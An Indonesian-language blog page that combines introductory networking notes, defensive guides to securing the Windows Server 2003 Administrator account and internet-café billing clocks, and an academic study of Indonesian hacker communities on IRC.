Gateway

Gateway berfungsi untuk sebagai penghubung LAN yang berbeda segmen atau kelasnya.Apabila dalam LAN terdapat lebih dari 1 workgroup ,maka untuk dapat melakukan koneksi ke komputer yang terhubung di dalam lan tetapi berlainan workgroup dengan cara FIND----> Isikan Komputer Nama --> Atau IP address komputer tersebut.

mohon maaf jika kualitas atau penulisan ini ada yang salah.Terimakasih.

Klik disini untuk melanjutkan »»

Konsep Dasar TCP IP

.
0 komentar

TCP/IP
Merupakan sekumpulan protokol yang mengatur komunikasi data antar
komputer di internet/jaringan, dengan adanya protokol-protokol
tersebut dimungkinkan adanya komunikasi data antara komputer yang satu
dengan yang lainnya tanpa membedakan jenis komputer dan sistem operasi
pada komputer tersebut.


TCP/IP
Merupakan sekumpulan protokol yang mengatur komunikasi data antar
komputer di internet/jaringan, dengan adanya protokol-protokol
tersebut dimungkinkan adanya komunikasi data antara komputer yang satu
dengan yang lainnya tanpa membedakan jenis komputer dan sistem operasi
pada komputer tersebut.

TCP/IP terdiri dari 4 lapis kumpulan protokol yaitu:

+-------------------------+
Aplication Layer
(HTTP,FTP,SMTP,dll)
+-------------------------+
Transport Layer
(TCP,UDP)
+-------------------------+
Internet Layer
(IP,ICMP,ARP)
+-------------------------+
Network Interface Layer
(Ethernet,X25,SLIP,PPP)
+-------------------------+


1. Network Interface Layer
Berfungsi untuk mengirim data ke media fisik dan menerima data
dari media fisik, media fisik bisa berupa kabel, serat optik dan
gelombang elektromagnetik.

2. Internet Layer
Berfungsi untuk melakukan pengiriman paket data dengan tepat
pada layer ini terdapat: IP, ICMP, ARP
-- IP (Internet Protocol)
Untuk melakukan pengiriman paket ke alamat yang tepat.
-- ICMP (Internet Control Message Protocol)
Untuk mengirim pesan-pesan kesalahan.
-- ARP (Address Resolution Protocol)
Untuk pemetaan IP Address dengan Ethernet adress, dimana
masing-masing Ethernet memiliki Ethernet Address yang unik,
dengan ARP dapat diketahui bahwa IP Address tertentu dimiliki
oleh Ethernet tertentu.

3. Transport Layer
Ada 2 Yaitu:
a. TCP (Transmission Control Protocol)
sifat TCP:
-- Connection Oriented
-- Reliable
-- Byte Stream Service
b. UDP (User Datagram Protocol)
Sifat UDP:
-- Connectionless
-- Tidak ada pengurutan kembali paket yang datang
-- Tidak ada Acknowledgement paket yang datang
-- Tidak ada Retransmisi

4. Aplication Layer
Aplikasi yang digunakan untuk melakukan pengiriman data maupun
penerimaan data.


Semoga esok hari kami bisa memberikan uraian yang lebih
mendalam dan jelas, atau mungkin teman² ada yang bisa
menambahkan, THX

Klik disini untuk melanjutkan »»

Melindungi Administrator Account Windows 2003 Server

.
0 komentar

Pendahuluan

Tidak terlalu banyak user account yang dibuat pada default Windows Server 2003 domain controller yang terinstall pada Active Directory. Adakalanya, salah satu user account yang perlu anda lindungi diatas seluruh account yang ada adalah Administator account. Account ini merupakan salah satu default account yang merupakan hak akses tertinggi pada Active Directory, domain controller, member server, client dan network service.

Administrator account pada Active Directory hanyalah salah satu dari sekian banyak Administrator account pada jaringan. Setiap member server dan client memiliki sebuah local administrator account, yang dirancang untuk memiliki kendali atas komputer dimana ia berada. Banyak informasi yang telah dibahas dalam artikel ini juga bisa digunakan untuk memproteksi local Administrator account. Cara terbaik untuk menyediakan kendali ini adalah dengan menggunakan Group Policy dari Active Directory.

Kita akan berfokus pada perlindungan Active Directory Administrator account, karena account ini memiliki pengaruh yang sangat luas. Bayangkan betapa banyaknya Administrator account yang bertanggung jawab mengontrol seluruh obyek dalam domain tersebut. Administrator account yang berada pada Active Directory pertama memiliki hak akses (privilege) khusus. Administrator account ini juga memberikan Enterprise Admins dan Schema Admins membership. Keberadaan ini dimaksudkan untuk mengontrol setiap obyek dalam forest yang ada, sama kuatnya dengan forest schema.

Seberapa pentingnya account ini?

Account Administrator di level Active Directory mencakup seluruh kemampuan komputer, termasuk domain controller, yang berisikan domain. Maksudnya bahwa user account ini dapat melakukan logon ke semua komputer, mengakses file apapun, dan menginstall aplikasi apapun. Bahkan jika local Administrator menghapus akses terhadap domain Administrator account, domain Administrator tersebut masih bisa di rampas kembali.

Ada juga hak akses penting yang dimiliki domain Administrator account, yang menyediakan kemampuan besar. Administrator bisa menambah komputer ke domain, memodifikasi user account apapun (termasuk password) dan membuat Group Policy Object (GPO) tanpa gangguan. Hak akses ini tidak dapat dihapus pada user account ini, semenjak mereka dibuat ada.

Dalam sistem operasi lawas, faktor kunci lain terhadap account ini tidak dapat dihapus atau disable. Hal ini menimbulkan masalah tertentu bagi sebagian administrator jaringan untuk mencoba dan melindungi account tersebut. Semenjak Windows Server 2003, Microsoft telah menyediakan kemampuan untuk mendisable-kan Administrator account. Kita akan membahas fitur ini nanti saat kita membahas tentang langkah-langkah yang dapat diambil guna melindungi account tersebut.

Mengapa account ini menjadi target?

Kaum Hacker dan Attacker menargetkan account ini untuk banyak alasan. Selain alasan yang telah dijelaskan di atas, para Attacker mengetahui banyak perihal account ini di berbagai environment.

Pertama, Administrator account disetiap komputer Windows keberadaannya memiliki Security Identifier (SID) yang mirip. SID merupakan karakter alpha-numerik tertentu yang digunakan oleh sistem operasi untuk melacak account dan memberikan akses terhadap sumber-daya. Apakah yang kita bicarakan mengenai Administrator account di Active Directory domain pertama atau account pada komputer Windows 2000 Professional, SID selalu berakhir dengan angka 500, sebagaimana yang ditunjukkan gambar dibawah ini:


Gambar 1: Administrator account pada komputer Windows selalu diakhir dengan angka 500

apakah kemampuan ini merupakan target yang mudah bagi attacker. Semenjak SID selalu diakhiri dengan angka 500, mereka menjadikan target account tersebut hanya dengan mengenumerasi SID dari Active Directory atau local SAM. Hal ini mungkin saja terlihat sulit, tapi tool seperti SID2USER dan USER2SID telah banyak mengatasi berbagai kesulitan ini untuk Anda.

Kedua, menurut sejarahnya, account ini harus ada pada Windows NT dan Windows 2000 Active Directory domain tidak dapat di disable atau dihapus. Hanya pada Windows Server 2003 maka account ini bisa di disable. Hal ini memungkinkan seorang attacker memiliki hak akses “administrator” account.

Terakhir, Administrator account merupakan target yang mudah bagi kebanyakan instalasi Active Directory dan Windows. Anda akan terkejut (mungkin juga tidak) betapa banyak perusahaan yang tidak melindungi account ini. Sebelum Windows Server 2003, Administrator account telah terinstall dengan blank password. Kita semua mengetahui bahwa password merupakan sebuah ijin untuk mengatur dan mengingat, jadi banyak perusahaan yang meninggalkan account ini tidak terlindungi dengan tidak merubah nama, tidak mengkonfigurasi password terkait (atau seluruh password).

Tingkat Dasar

Dengan begitu banyaknya alasan untuk melindungi account ini, berikut ini beberapa langkah dasar yang diambil guna melindungi Administrator account.

1. Gantilah nama – jika anda membiarkan nama yang sama secara default, hal ini sama saja memberikan setengah informasi yang diperlukan seorang attacker untuk logon dengan account tersebut. Banyak perusahaan mengubah nama tersebut untuk disesuaikan dengan skema penamaan user yang lain. Jadi, nama Joe Smith bisa jadi adalah Administrator account untuk mengelabui para hacker dan end user.

2. Hapus keterangan – keterangan dari Administrator account yang menyatakan bahwa ini adalah default Administrator account, harus diubah (atau dihapus) untuk melindungi account tersebut.

3. Buatlah sebuah Administrator account “palsu” – sebagian para attacker akan mencari nama Administrator. Jadi, jika anda membuat sebuah account yang tidak memiliki hak akses dan bahkan di disable, para attacker tidak memiliki kesempatan untuk mendapatkan akses ke jaringan anda melalui account ini.

4. Gunakan password yang kompleks untuk account ini – yang saya maksudkan dengan kompleks disini sama halnya dengan sistem operasi yang digunakan. Disini, saya menyarangkan agar anda membuat sebuah password kalimat untuk account ini. Saya sarankan agar anda menggunakan password seperti ini:

Saya tinggal di Arizona dimana suhu rata-rata selama musim panas adalah 105

5. Jangan gunakan account ini – saya menemukan banyak perusahaan yang menggunakan account ini untuk perawatan rutin, tugas-tugas, dan administrasi. Saya juga menemukan bahwa account ini dikonfigurasi sebagai service account untuk banyak network service. Account ini seharusnya tidak pernah digunakan, terkecuali bila terjadi kerusakan yang memerlukan account ini digunakan untuk mengakses domain controller.

Tingkat Lanjut

Kelanjutan dari langkah-langkah dasar yang dilakukan untuk melindungi account ini, adalah trik yang dapat anda lakukan untuk mendapatkan akses dan keamanan Administrator account ke sebuah level baru.

1. Disable the Administrator account – ini adalah setting Group Policy yang memungkinkan anda mendisable account dalam domain dan local SAM pada Windows XP dan Windows Server 2003 computer. Policy ini ada dibawah setting GPO berikut:

Computer Configuration|Windows Settings|Security Settings|Local Policies|Security Options|Accounts: Administrator account status

Setting policy ini bisa dilihat pada gambar 2, dan tinggal diatur ke Enable untuk melakukan setting ini.


Gambar 2: Setting GPO yang memungkinkan anda mendisable Administrator account

2. Gantilah Administrator account dengan menggunakan GPO – akan sulit mendisable setiap Administrator account pada setiap komputer untuk aplikasi dan kebutuhan lainnya. Dalam kasus ini anda melakukan pendekatan yang mudah untuk memastikan bahwa Administrator account telah diganti. Anda dapat mengonfigurasi setting GPO berikut, yang bisa mengganti Administrator account pada komputer Windows 2000, XP atau Server 2003.

Computer Configuration|Windows Settings|Security Settings|Local Policies|Security Options|Accounts: Rename Administrator account

3. Deny “Access this computer from the network” User Right – dengan default Administrator account yang dikelompokkan kedalam Everyone and Authenticated Users group, yang memberikan account tersebut kemampuan mengakses seluruh komputer pada jaringan secara default. Pada saat Administrator account tidak digunakan untuk keperluan administrasi rutin, maka tidak perlu account tersebut untuk mengakses berbagai sumber, server atau jaringan. Jika anda mengonfigurasi setting Group Policy User Right berikut untuk Administrator account, maka akan mengurangi resiko penyerangan terhadap Administrator account.



Computer Configuration|Windows Settings|Security Settings|Local Policies|User Rights Assignment|Deny access to this computer from the network

Kesimpulan

Administrator account merupakan sesuatu yang powerful di dunia Windows. Entah anda membicarakan tentang Administrator account dalam Active Directory atau Administrator account yang lebih rendah pada local SAM dari komputer Windows 2000 Profesional, account tersebut memiliki hak akses tertinggi atas seluruh user account secara default. Anda perlu mengambil langkah yang sesuai untuk melindungi account ini guna memastikan bahwa hal ini tidak di ekspos dan mengurangi resiko sistem anda dilumpuhkan. Ada beberapa langkah dasar (seringkali diabaikan) yang bisa anda gunakan untuk melindungi account ini. Setelah langkah-langkah dasar tersebut anda bisa mengonfigurasi lebih lanjut untuk mengurangi resiko serangan yang lebih jauh.

Tentang Derek Melber

Klik disini untuk melanjutkan »»

Melindungi Program Billing Warnet

.
0 komentar

by Chandraleka
chandrk@hotmail.com
http://come.to/digitalworks
http://www.geocities.com/hchandraleka/index.html


Artikel ini merupakan solusi dan himbauan kepada khususnya para pengusaha warnet dan
rental pengetikan yang menggunakan program billing komputer sebagai cara menghitung biaya
pemakaian komputer. Karena kebanyakan program billing yang mereka gunakan mengambil waktu dari
komputer client, sehingga terdapat celah bagi para penyewa komputer tersebut untuk mengubah
lama pemakaian sewa komputernya.

Umumnya dan kebanyakan program billing yang ada mengambil waktu dari komputer lokal (client)
sehingga apabila timer di pojok kanan bawah diubah mundur maka perhitungan program billing
berubah. Misalnya, seharusnya sudah Rp 8000 menjadi Rp 6000, karena durasi pemakaian telah
dikurangi. Hal ini tentu akan sangat merugikan bagi para pengusaha warnet atau rental komputer
biasa. Untuk itu artikel ini hadir untuk membuat solusinya dengan cara yang paling mudah dan
murah.
Penulis tidak menyarankan untuk meng-upgrade dan memperbaiki program billing tersebut
karena akan memerlukan biaya yang mahal kecuali warnet tersebut telah mempunyai programmer
sendiri, tetapi tetap gunakan saja program billing yang sudah ada itu dengan ditambah cara untuk
memproteksi timer komputer. Jadi program billing yang ada tetap digunakan dan dibarengi dengan
melindungi timer komputer dari perubahan tangan - tangan usil user penyewa warnet.

Pada dasarnya akses ke timer komputer dapat diperoleh dengan tiga cara yaitu :
1. Melalui Start | Setting | Taskbar & Start Menu
2. Melalui Start | Setting | Control Panel | Date/Time
3. Klik kanan pada taskbar dan pilih Properties kemudian check Show Clock dan tekan OK.

Dengan memproteksi atau memblok akses ke timer komputer, maka user tidak dapat mempermainkan
durasi waktu yang telah dihitung oleh program billing kita. Ikuti langkah - langkah berikut
untuk memproteksinya :
1. Klik kanan taskbar dan pilih Properties, kemudian uncheck Show Clock dan tekan tombol
OK. Dan jangan senang dulu karena langkah ini belum apa - apa.
2. Tekan Start | Run, dan ketik "Regedit" pada bagian Open.
3. Mulai step ini pembaca akan mempermainkan registry Windows, suatu bagian yang paling
vital dari sistem Operasi Microsoft Windows.
4. Buka key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
5. Klik Edit | New | DWORD Value. Beri nama dengan "NoSetFolders" dan isikan dengan
nilai "1".
6. Klik lagi Edit | New | DWORD Value. Beri nama dengan "NoSetTaskbar" dan isikan dengan
nilai "1".
7. Buka key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.
8. Klik lagi Edit | New | DWORD Value. Beri nama dengan "DisableRegistryTools" dan isikan
dengan nilai "1". Bagian yang terakhir ini untuk memblok pengaksesan registry. Sehingga user
tidak dapat mengubah - ubah registry.
9. Restart PC dan program billing Anda telah terlindungi dengan baik. Have An Ice Day…..

Ini hanyalah satu tips sederhana untuk melindungi program billing dalam usaha mencegah kerugian
yang akan kita dapat ….

Klik disini untuk melanjutkan »»

Memahami Karakteristik Komunitas Hacker

.
0 komentar

"Memahami Karakteristik Komunitas Hacker :
Studi Kasus pada Komunitas Hacker Indonesia"

oleh: Donny B.U., M.Si.*


=========
Pengantar
=========
Log In, Hack In, Go Anywhere, Steal Anything. Ungkapan tersebut terpampang mencolok di sampul VCD berjudul Swordfish, sebuah film keluaran Hollywood pada tahun 2001. Dalam film tersebut dikisahkan bagaimana seorang veteran hacker bernama Stanley Jobson (diperankan oleh Hugh Jackman) tergiur dengan iming-iming imbalan uang yang ditawarkan oleh Ginger (diperankan oleh Halle Berry) atas perintah Gabriel Shear (diperankan oleh John Travolta). Jobson yang kehidupannya nyaris bangkrut tersebut diperintah oleh Shear untuk membobol sekuriti komputer sebuah bank sentral. Melalui keahliannya meng-hacking, maka Shear berhasil memindahkan sejumlah nominal uang secara digital dari satu bank ke beberapa bank lainnya di dunia.

Apa yang digambarkan oleh film Swordfish tersebut sejatinya membiaskan makna hacker yang sesungguhnya. Pada film tersebut, hacker diidentikkan dengan seseorang yang bertangan dingin dalam mengutak-atik program komputer dan melakukan upaya-upaya penerobosan suatu sistem komputer tanpa otorisasi yang sah dengan tujuan untuk mengambil atau mencuri sesuatu. Cracker, adalah istilah yang paling tepat untuk menyebutkan profesi Jobson pada film tersebut. Sebelum kita mengupas lebih jauh tentang perbedaan hacker dan cracker, serta problematikanya di Indonesia, ada baiknya kita beberkan lebih lanjut beberapa dosa Hollywood (baca: Amerika) dalam membiaskan makna hacker dan cracker.

Kita ingat, pada tahun 1995 Hollywood mengeluarkan sebuah film berjudul Hackers, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan kisah anak-anak muda yang terobsesi menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Penembusan sistem keamanan tersebut merupakan salah satu syarat yang harus ditempuh oleh sekelompok anak muda tersebut jika ingin bergabung dalam sebuah kelompok hacker elit. Dalam film tersebut, Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.

Kemudian pada tahun yang sama keluar pula film berjudul The Net yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang, melalui jaringan Internet. Selanjutnya pada tahun 1999 diluncurkan film berjudul Take Down, mengangkat kisah nyata perburuan Kevin Mitnick (diperankan oleh Skeet Ulrich), pembobol sekuriti, oleh Tsutomo Shimomura (diperankan oleh Russel Wong), pakar sekuriti. Dalam film tersebut secara jelas diucapkan dan dituliskan bahwa Kevin Mitnick adalah seorang hacker yang melanggar hukum.

Meskipun Shimomura menegaskan kepada petugas FBI McCoy Rollins (yang diperankan oleh Tom Berenger) bahwa Mitnick adalah cracker sedangkan Shimomura adalah hacker, pada awal film tersebut tampak jelas bahwa media massa Amerika menyebut Mitnick sebagai seorang hacker. Uniknya, terdapat perdebatan norma di dalam film tersebut antara hacker dan cracker, antara Mitnick dan Shimomura. Karena pada dasarnya mereka berdua melakukan hal yang sama dalam penetrasi sekuriti. Bedanya, Mitnick melakukannya atas dasar kebebasan informasi, sedangkan Shimomura atas dasar tindakan perlindungan informasi.

Dengan keluarnya film-film versi industri Hollywood tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT. Media massa Amerika pun lebih sering menggunakan istilah hacker. Sekedar contoh, pada Newsweek edisi 21 Februari 2000, pada cover depan tertulis: "The Hunt for the Hackers. Hijacking the Net. How to Protect Yourself". Di dalam majalah tersebut, terdapat 10 halaman yang mengulas tentang sekuriti dan kebijakan pemerintah Amerika pasca serangan Distributed Denial of Service (DDoS) ke situs-situs ternama. Judul utama ke 10 halaman tersebut adalah "Hunting The Hackers".

Maka kesalah-kaprahan penggunaan terminologi hacker tersebut notabene adalah berawal dari negara kelahirannya sendiri, Amerika. Kemudian masyarakat dan media massa di Indonesia pun mau tidak mau melakukan hal yang sama, menggunakan terminologi hacker yang bias dengan terminologi cracker.

Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama sebelumnya.

Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Hal tersebut disebabkan karena pada saat itu untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut oleh media massa Amerika sebagai hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos.

Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan lima pelaku lainnya mendapatkan hukuman masa percobaan. Pada tahun yang sama keluar pula sebuah film berjudul War Games yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengkontrol persenjataan nuklir AS.

Menurut James O'Brien dalam bukunya Management Information System (McGraw-Hill, 1999), hacking didefinisikan sebagai sebuah perilaku obsesif dan atau tanpa otorisasi yang sah dalam menggunakan komputer atau sistem jaringan komputer dan pelakunya disebut dengan istilah hacker. Ditambahkan pula bahwa hacker ilegal, yang kerap mencuri dan atau merusak data atau program, mencuri kartu kredit hingga mengganti tampilan suatu situs di Internet disebut dengan istilah cracker, dan aktifitasnya disebut cracking.

Secara spesifik, Richard Mansfield dalam bukunya Hacker Attack (Sybex, 2000) mendefinisikan hacker sebagai seseorang yang memiliki keinginan untuk melakukan eksplorasi dan penetrasi terhadap sebuah sistem operasi dan kode komputer pengaman lainnya, tetapi tidak melakukan tindakan pengrusakan apapun, tidak mencuri uang atau informasi. Mansfield menambahkan bahwa cracker adalah sisi gelap dari hacker dan memiliki kertertarikan untuk mencuri informasi, melakukan berbagai macam kerusakan dan sesekali waktu juga melumpuhkan keseluruhan sistem komputer.

Hacker sebenarnya memiliki kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984. Kode etik hacker tersebut, yang kerap dianut pula oleh para cracker, adalah :

1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali
2. Segala informasi haruslah gratis
3. Jangan percaya pada otoritas, promosikanlah desentralisasi
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.

Mansfield menyatakan bahwa perbedaan terminologi antar hacker dan cracker terkadang menjadi bias dan hilang sama sekali dalam perspektif media massa dan di masyarakat umum. Bahkan para cracker juga tidak jarang menyebut diri mereka sebagai hacker sehingga menyebabkan citra hacking menjadi buruk. Pernyataan tersebut merupakan penguatan dari pendapat Christian Crumlish dalam bukunya The Internet Dictionary (Sybex, 1995) yang menyatakan bahwa masyarakat di luar komunitas Internet, baik media massa maupun masyarakat umum, lebih familiar menggunakan istilah hacker untuk setiap perilaku eksplorasi dan penetrasi sebuah sistem komputer yang dilakukan secara ilegal dan cenderung bersifat merugikan pihak lain.

Untuk selanjutnya, dalam artikel ini terminologi hacker yang akan dipakai akan mengacu kepada "seseorang yang melakukan penetrasi atau masuk ke dalam suatu sistem komputer tanpa otorisasi yang sah". Terminologi hacker yang dipakai tersebut merupakan terminologi yang lebih kerap digunakan oleh media massa dan dipahami masyarakat umum.


==============================
Hacker Sebagai Individu Sosial
==============================
Sebagai individu sosial, seorang hacker tidak pernah lepas dari proses interaksi sosial dengan hacker lainnya atau dengan komunitas hacker-nya. Interaksi sosial adalah suatu hubungan antara dua individu atau lebih, sehingga kelakuan individu yang satu mempengaruhi, mengubah atau memperbaiki kelakukan individu yang lain atau sebaliknya. Dari interaksi sosial tersebut maka akan terbentuklah suatu kelompok sosial.

Kelompok sosial adalah suatu unit sosial atau kesatuan sosial yang terdiri atas dua individu atau lebih yang telah mengadakan interaksi sosial yang cukup intensif dan teratur, sehingga di antara individu itu sudah terdapat pembagian tugas, struktur, dan norma-norma yang khas bagi kelompok itu. Komunikasi antara hacker dengan hacker lainnya menggunakan sebuah media komunikasi berbasis Internet.

Winn Schawartau dalam bukunya Information Warfare (Thunder's Mouth Press, 1996) menegaskan bahwa hacker merupakan salah satu jenis individu yang menggunakan Internet sebagai media komunikasi dan media interaksi sosial antar sesama hacker lainnya. Ditambahkan pula oleh Schawartau bahwa kelompok hacker merupakan sebuah subkultur dari masyarakat yang memiliki ketertarikan yang sama dalam hal elektronis (jaringan komputer di Internet) dan antar anggotanya saling terlibat secara mental (emosional). Menurut Howard Rheingold dalam bukunya The Virtual Community (The MIT Press, 2000), Internet merupakan sebuah peluang untuk menghadirkan kembali hubungan antar pribadi yang pada saat ini intensitasnya semakin berkurang.

Di dalam Internet, perbedaan gender, usia, bangsa dan penampilan fisik tidak menjadi soal, karena memang hal tersebut tidak bisa dilihat langsung. Itulah yang menyebabkan hacker tertarik untuk menggunakan Internet sebagai sarana komunikasi dan sekaligus membentuk suatu komunitas, yaitu lantaran Internet memungkinkan hacker dapat berinteraksi dengan pihak lain tanpa harus menunjukkan jati diri sebenarnya (anonimitas / anonimity).

Joel Best dan David Luckenbill dalam bukunya Organizing Deviance (Prentice Hall, 1994) menganalisa bahwa perilaku menyimpang hacker memiliki dua setting yaitu onstage dan backstage. Onstage adalah ketika masing-masing individu beraksi sendiri melakukan hacking, sedangkan backstage adalah saat ketika para pelaku sedang tidak melakukan hacking dan mereka berkumpul untuk saling bersosialisasi dan berkomunikasi.

Berangkat dari beberapa pemahaman di atas, maka artikel ini mencoba memaparkan intisari dari tesis penulis yang berjudul "Pola Komunikasi Dalam Kelompok Hacker Dan Hubungannya Dengan Kegiatan Hacking : Studi Kasus Pada Hacker Di Indonesia", dan telah dipertahankan di hadapan sidang penguji tesis program studi Ilmu Komunikasi program pascasarjana Universitas Indonesia (UI) pada tanggal 24 Januari 2002. Tesis penulis tersebut menggunakan metodologi kualitatif dengan tipe penelitian eksploratif untuk mendapatkan pemahaman tentang pola pola komunikasi dalam kelompok hacker dan hubungannya dengan kegiatan hacking. Penulis telah menggunakan Internet, khususnya aplikasi Internet Relay Chat (IRC) sejak tahun 1996 dan berprofesi sebagai wartawan bidang TI di media online Detikcom sejak Desember 1999 hingga November 2001.

Saat di Detikcom, penulis banyak melakukan pengamatan perilaku hacker dan menulis berita tentang aktifitas hacking, sehingga mendapatkan pemahaman yang cukup mendalam tentang bagaimana sebuah komunitas maya dapat terbentuk serta dinamika kelompok hacker di Indonesia. Kemudian penulis mulai intensif mengamati chat room para hacker ketika maraknya aktifitas hacking sepanjang tahun 2000 dan tahun 2001. Sebelum menentukan hacker mana yang tepat dan bersedia diwawancara sebagai data primer tesis, penulis melakukan observasi tahap awal ke beberapa chat room hacker, serta melakukan studi literatur tentang berita-berita kegiatan hacking yang dilakukan oleh hacker Indonesia.

Beberapa chat room hacker yang diobservasi antara lain chat room #Hackerlink, #AntiHackerlink, #IndoSniffing, #Jasakom, #Betalmostdone dan #K-Elektronik. Kemudian untuk studi literatur difokuskan pada berita-berita dan artikel-artikel tentang hacker Indonesia dan kegiatan hacking yang dimuat oleh media massa Indonesia. Akhirnya penulis menetapkan tujuh hacker Indonesia yang bersedia di wawancara secara intensif melalui e-mail. (nickname hacker kami samarkan - penulis).


================================================
Karakteristik Chatroom dan Komunitas Maya Hacker
================================================
Berdasarkan hasil analisa dari data-data yang telah dikumpulkan oleh penulis, terdapat fakta bahwa hacker yang memiliki atau bergabung dalam suatu kelompok hacker tertentu, ternyata menggunakan Internet Relay Chat (IRC) atau chatroom. Bukan tidak mungkin bahwa hacker yang tergabung dalam sebuah chatroom dalam jangka waktu tertentu, secara berkala dan konsisten, bisa membentuk sebuah kelompok hacker tertentu.

Nama kelompok hacker tersebut akan mengikuti nama chat roomnya, ataupun nama chatroom yang dipilih akan menyesuaikan dengan nama kelompok hacker tersebut. Nama dari sebuah chatroom akan mengidentifikasikan nama kelompok hacker tersebut, demikian pula sebaliknya, nama sebuah kelompok hacker akan mengidentifikasikan nama chatroom yang digunakan. Contohnya kelompok hacker AntiHackerlink, Jasakom dan K-Elektronik, masing-masing memiliki chatroom dengan nama #AntiHackerlink, #Jasakom dan #K-Elektronik. Ketiga chat room tersebut berada di sebuah server Internet global yang bernama DALnet.

Berikut ini adalah data-data teknis ketiga chatroom tersebut :
Info for #antihackerlink:
Founder : -------- (Anon@202.146.241.142)
Mode Lock : -m
Last Topic : http://www.research.att.com/sw/tools/uwin/ (zer0_c00l)
Description: ::..:: We Are Indonesia Hacker's Crew ::..::
Options : SecuredOps, Verbose, "Sticky" Topics
Memo Level : AOP
Registered : Sat 12/01/2001 09:53:08 GMT
Last opping: Sun 12/23/2001 09:46:56 GMT
*** End of Info ***

Info for #jasakom:
Founder : ---- (sdfgsdf@202.47.64.5Cool
Mode Lock : -i
Description: WWW.JASAKOM.COM
Memo Level : AOP
Registered : Tue 05/29/2001 02:30:10 GMT
Last opping: Sun 12/23/2001 09:42:37 GMT
-ChanServ- *** End of Info ***

Info for #k-elektronik:
Founder : ------------ (~XWindows@thugscript.net)
Mode Lock : +cnt-sipkR
Last Topic : | Kecoak Crew | the great way to learn (wellex)
Description: www.k-elektronik.org
URL : http://www.k-elektronik.org
Options : SecuredOps, Ident, Topic Lock(S)
Memo Level : SOP
Registered : Tue 12/04/2001 08:35:17 GMT
Last opping: Sun 12/23/2001 11:50:29 GMT
*** End of Info ***


Tampak jelas dalam data-data di atas mengenai nickname pendiri (founder), waktu didirikan (registered), deskripsi (description) chatroom, dan sebagainya. Sebuah chatroom dapat menjadi suatu perwujudan dari keberadaan sebuah kelompok sosial atau komunitas hacker. Kemampuan dan fungsi chatroom memang memungkinkan hal tersebut.

Pertama, chatroom mampu berfungsi sebagai sarana komunikasi sosial dan dapat pula menjadi manifestasi kelompok sosial itu sendiri. Kemampuan chatroom menjadi sebuah sarana komunikasi sosial karena secara teknis di dalam chatroom para chatters dapat melakukan komunikasi interpersonal (private chat) dan komunikasi kelompok (public chat). Baik private chat maupun public chat, antar pelakunya harus berada dalam satu tempat yang sama (bertemu dalam satu chatroom tertentu) dan dalam waktu yang sama pula (real time). Salah satu tahap terjadinya interaksi sosial adalah adanya kontak, yang bisa bersifat sekunder (menggunakan media tertentu, dalam hal ini melalui chatroom) dan langsung (tanpa perantara individu lain meskipun tidak face-to-face).

Keduam chatroom mampu menjadi sebuah kelompok sosial. Hal tersebut tak lepas pula dari karakteristik teknis chatroom itu sendiri. Pertama-tama, kita definisikan dahulu arti kata kelompok sosial. Menurut George Hillery dalam jurnal CyberSociology (www.cybersoc.com), ciri komunitas adalah adanya sekelompok orang yang saling melakukan interaksi sosial dan ada suatu persamaan yang mengikat mereka pada kelompok tersebut dan antar sesama anggota kelompok, serta mereka berbagi area tertentu dalam jangka waktu tertentu.

Geoffrey Liu dalam jurnal Computer-Mediated Communication (www.ascusc.org/jcmc), menetapkan beberapa syarat terjadinya komunitas atau kelompok sosial maya, yaitu: (1). adanya ruang publik maya, (2). adanya aktifitas komunikasi dari para komunikator, (3). adanya anggota dengan jumlah besar sehingga memungkinkan terjadinya beberapa interaksi, (4). adanya kestabilan jumlah anggota dan konsistensi pemunculan anggota dan (5). adanya interaktifitas pesan verbal, pesan simulasi aksi dan konsistensi penggunaan nickname.

Di dalam chatroom, khususnya server DALnet, ada jenjang struktural dan fungsional yang baku. Jenjang pertama dan tertinggi adalah founder, super operator (SOP) dan auto operator (AOP) dan temporary operator. Keempat jabatan tersebut selain struktural, juga fungsional. Mereka secara umum disebut Operator (OP) dan menggunakan tanda "@" di depan nickname mereka. Nickname mereka secara otomatis akan berada di urutan teratas dari listname pengunjung chatroom. Ketiganya merupakan penguasa sebuah chatroom yang dapat mengundang orang lain untuk datang, mengusir paksa orang dan mengawasi setiap percakapan publik yang terjadi di chatroom.

